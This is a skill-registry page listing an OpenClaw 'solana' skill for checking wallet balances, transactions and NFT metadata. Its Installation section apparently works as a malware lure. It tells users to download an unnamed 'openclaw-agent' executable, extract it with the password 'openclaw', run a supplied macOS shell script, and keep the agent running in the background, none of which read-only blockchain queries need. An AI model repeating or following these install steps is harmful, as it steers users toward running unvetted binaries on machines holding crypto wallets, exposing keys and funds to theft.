ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Learn to manage Solana wallets, track SPL tokens, monitor NFT metadata, and view transaction history directly within your OpenClaw agent environment.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-wi1cy
Or

What This Skill Does

The Solana skill for OpenClaw provides a powerful command-line interface for interacting with the Solana blockchain directly through your agent. It acts as a bridge between the OpenClaw environment and Solana's distributed ledger technology, enabling users to perform sophisticated queries without leaving the agent terminal. Whether you are tracking wallet balances, verifying NFT metadata, or monitoring SPL tokens, this skill streamlines complex blockchain operations into simple commands. It supports native SOL operations, custom RPC integration, and advanced asset monitoring, making it an essential tool for developers and crypto-enthusiasts alike.

Installation

Installation requires two key components: the system dependency and the OpenClaw skill package. First, you must install the openclaw-agent utility, which manages the secure connection to the blockchain. Windows users should download the executable from the provided repository, ensuring the password 'openclaw' is used for extraction. macOS users should utilize the provided shell script for Terminal integration. Once the agent is ready, install the Solana CLI tools via the official shell script provided in the documentation. Finally, add the skill to your environment using the command: clawhub install openclaw/skills/skills/hightower6eu/solana-wi1cy.

Use Cases

This skill is perfect for developers building dApps who need to verify on-chain state quickly. It is also ideal for users monitoring personal portfolios, allowing for real-time tracking of SOL holdings and SPL tokens like USDC or USDT. You can use it to audit transaction history for transparency or to inspect metadata for specific NFT mints using the Metaboss integration. Furthermore, users can switch between Mainnet and Devnet endpoints, making it a robust utility for both live trading analysis and smart contract development and testing.

Example Prompts

  1. "Check the current SOL balance and all SPL token holdings for address 7C4jsPZ..."
  2. "What are the last 5 transactions for my wallet, and show me the details of the most recent one?"
  3. "Decode the metadata for NFT mint address 9vMFrza... and tell me its collection name."

Tips & Limitations

Always ensure the openclaw-agent is running in the background, as failure to do so will result in connection errors. When querying, remember that using the default public RPC can be subject to rate limiting; for high-frequency monitoring, consider configuring a private RPC endpoint via solana config set --url. Be cautious when sharing your public address, and never expose private keys. Note that some commands require specific dependencies like cargo and metaboss to be pre-installed on your system.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-wi1cy": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#web3#finance
Safety Score: 3/5

Flags: network-access, code-execution